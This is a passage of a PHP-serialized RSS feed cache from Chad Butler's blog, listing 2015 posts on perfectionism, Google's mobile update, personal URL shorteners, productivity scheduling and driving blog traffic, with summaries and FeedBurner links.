\";}i:6;a:5:{s:4:\"data\";s:12:\"productivity\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://www.butlerblog.com/?p=3370\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1770:\"It’s called “Perfectionism” and it effects many new writers, developers, and freelancers. At some point, it effects almost everyone who attempts to launch their business online...<br/>\n<br/>\n[[ This is a content summary only. Visit my website for full links, other content, and more! ]]<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=AFPMDwe6Lv8:pK0kUdPxMmA:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=AFPMDwe6Lv8:pK0kUdPxMmA:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=AFPMDwe6Lv8:pK0kUdPxMmA:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=AFPMDwe6Lv8:pK0kUdPxMmA:dnMXMwOfBR0\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=dnMXMwOfBR0\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=AFPMDwe6Lv8:pK0kUdPxMmA:F7zBnMyn0Lo\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=AFPMDwe6Lv8:pK0kUdPxMmA:F7zBnMyn0Lo\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=AFPMDwe6Lv8:pK0kUdPxMmA:7Q72WNTAKBA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=7Q72WNTAKBA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=AFPMDwe6Lv8:pK0kUdPxMmA:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=AFPMDwe6Lv8:pK0kUdPxMmA:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=AFPMDwe6Lv8:pK0kUdPxMmA:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/butlerblog/~4/AFPMDwe6Lv8\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Chad Butler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"http://www.butlerblog.com/2015/06/04/dont-let-this-mistake-kill-your-business/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"http://www.butlerblog.com/2015/06/04/dont-let-this-mistake-kill-your-business/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:42:\"\n \n \n \n \n \n \n \n \n\n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"Is your site ready for mobilegeddon?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://feedproxy.google.com/~r/butlerblog/~3/mgXl7Q4PrM8/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"http://www.butlerblog.com/2015/04/20/is-your-site-ready-for-mobilegeddon/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 21 Apr 2015 03:34:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:13:\"Blogging Tips\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:9:\"Editorial\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"Web\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://www.butlerblog.com/?p=3393\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1771:\"Is your site currently mobile friendly? How fast does it load on mobile devices? Dubbed “Mobilegeddon,” Google will be making changes to its search algorithm on Tuesday to take into...<br/>\n<br/>\n[[ This is a content summary only. Visit my website for full links, other content, and more! ]]<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=mgXl7Q4PrM8:77HxzmE4DWw:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=mgXl7Q4PrM8:77HxzmE4DWw:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=mgXl7Q4PrM8:77HxzmE4DWw:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=mgXl7Q4PrM8:77HxzmE4DWw:dnMXMwOfBR0\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=dnMXMwOfBR0\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=mgXl7Q4PrM8:77HxzmE4DWw:F7zBnMyn0Lo\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=mgXl7Q4PrM8:77HxzmE4DWw:F7zBnMyn0Lo\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=mgXl7Q4PrM8:77HxzmE4DWw:7Q72WNTAKBA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=7Q72WNTAKBA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=mgXl7Q4PrM8:77HxzmE4DWw:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=mgXl7Q4PrM8:77HxzmE4DWw:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=mgXl7Q4PrM8:77HxzmE4DWw:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/butlerblog/~4/mgXl7Q4PrM8\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Chad Butler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"http://www.butlerblog.com/2015/04/20/is-your-site-ready-for-mobilegeddon/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"http://www.butlerblog.com/2015/04/20/is-your-site-ready-for-mobilegeddon/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:69:\"\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"Personal Brand Building with Your Own URL Shortener\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://feedproxy.google.com/~r/butlerblog/~3/ISeEKBHBNSU/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"http://www.butlerblog.com/2015/02/05/personal-brand-building-your-own-url-shortener/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 14:00:49 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:12:{i:0;a:5:{s:4:\"data\";s:13:\"Blogging Tips\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"blogging\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:14:\"Brand Building\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:11:\"Brand Image\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:8:\"branding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:17:\"content-marketing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:6;a:5:{s:4:\"data\";s:17:\"Personal Branding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:7;a:5:{s:4:\"data\";s:14:\"Shortened Urls\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:8;a:5:{s:4:\"data\";s:4:\"tips\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:9;a:5:{s:4:\"data\";s:5:\"tools\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:10;a:5:{s:4:\"data\";s:6:\"webdev\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:11;a:5:{s:4:\"data\";s:9:\"WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://www.butlerblog.com/?p=3297\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1775:\"You may have noticed that last year I started the process of reinforcing my personal brand image, placing a larger importance on personal branding. This included a web site makeover, a new logo for...<br/>\n<br/>\n[[ This is a content summary only. Visit my website for full links, other content, and more! ]]<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=ISeEKBHBNSU:dx5Efy0GcqQ:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=ISeEKBHBNSU:dx5Efy0GcqQ:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=ISeEKBHBNSU:dx5Efy0GcqQ:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=ISeEKBHBNSU:dx5Efy0GcqQ:dnMXMwOfBR0\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=dnMXMwOfBR0\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=ISeEKBHBNSU:dx5Efy0GcqQ:F7zBnMyn0Lo\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=ISeEKBHBNSU:dx5Efy0GcqQ:F7zBnMyn0Lo\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=ISeEKBHBNSU:dx5Efy0GcqQ:7Q72WNTAKBA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=7Q72WNTAKBA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=ISeEKBHBNSU:dx5Efy0GcqQ:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=ISeEKBHBNSU:dx5Efy0GcqQ:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=ISeEKBHBNSU:dx5Efy0GcqQ:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/butlerblog/~4/ISeEKBHBNSU\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Chad Butler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"http://www.butlerblog.com/2015/02/05/personal-brand-building-your-own-url-shortener/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"http://www.butlerblog.com/2015/02/05/personal-brand-building-your-own-url-shortener/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:48:\"\n \n \n \n \n \n \n \n \n \n \n\n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"Schedule Your Day to Improve Productivity in 3 Easy Steps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://feedproxy.google.com/~r/butlerblog/~3/M8lGPovanBo/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:103:\"http://www.butlerblog.com/2015/02/03/schedule-your-day-to-improve-productivity-in-3-easy-steps/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 13:00:12 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:13:\"Blogging Tips\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"blogging\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:17:\"content-marketing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:11:\"development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:9:\"freelance\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://www.butlerblog.com/?p=3239\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1775:\"I once wrote a post about the importance of avoiding distractions as a freelancer. It began with a little story about burning a pot of coffee and related that to how distractions can yield a similar...<br/>\n<br/>\n[[ This is a content summary only. Visit my website for full links, other content, and more! ]]<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=M8lGPovanBo:aXSUkrdH0YQ:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=M8lGPovanBo:aXSUkrdH0YQ:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=M8lGPovanBo:aXSUkrdH0YQ:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=M8lGPovanBo:aXSUkrdH0YQ:dnMXMwOfBR0\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=dnMXMwOfBR0\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=M8lGPovanBo:aXSUkrdH0YQ:F7zBnMyn0Lo\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=M8lGPovanBo:aXSUkrdH0YQ:F7zBnMyn0Lo\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=M8lGPovanBo:aXSUkrdH0YQ:7Q72WNTAKBA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=7Q72WNTAKBA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=M8lGPovanBo:aXSUkrdH0YQ:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=M8lGPovanBo:aXSUkrdH0YQ:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=M8lGPovanBo:aXSUkrdH0YQ:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/butlerblog/~4/M8lGPovanBo\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Chad Butler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"http://www.butlerblog.com/2015/02/03/schedule-your-day-to-improve-productivity-in-3-easy-steps/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"http://www.butlerblog.com/2015/02/03/schedule-your-day-to-improve-productivity-in-3-easy-steps/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n \n \n\n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"5 Top Bloggers Teach You How to Drive Traffic to Your Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://feedproxy.google.com/~r/butlerblog/~3/LKX4GwZQzyE/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"http://www.butlerblog.com/2015/02/02/5-top-bloggers-teach-you-how-to-drive-traffic-to-your-blog/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 18:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:4:{i:0;a:5:{s:4:\"data\";s:13:\"Blogging Tips\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"blogging\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:17:\"content-marketing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:4:\"tips\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://www.butlerblog.com/?p=3131\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1772:\"These 5 top bloggers command top dollar for their advice and expertise. Here is an opportunity for you to get some of their best advice on how to get more blog traffic. And you don’t have to...<br/>\n<br/>\n[[ This is a content summary only. Visit my website for full links, other content, and more! ]]<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=LKX4GwZQzyE:mtZt7OT42PU:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=LKX4GwZQzyE:mtZt7OT42PU:V_sGLiPBpWU\"><img 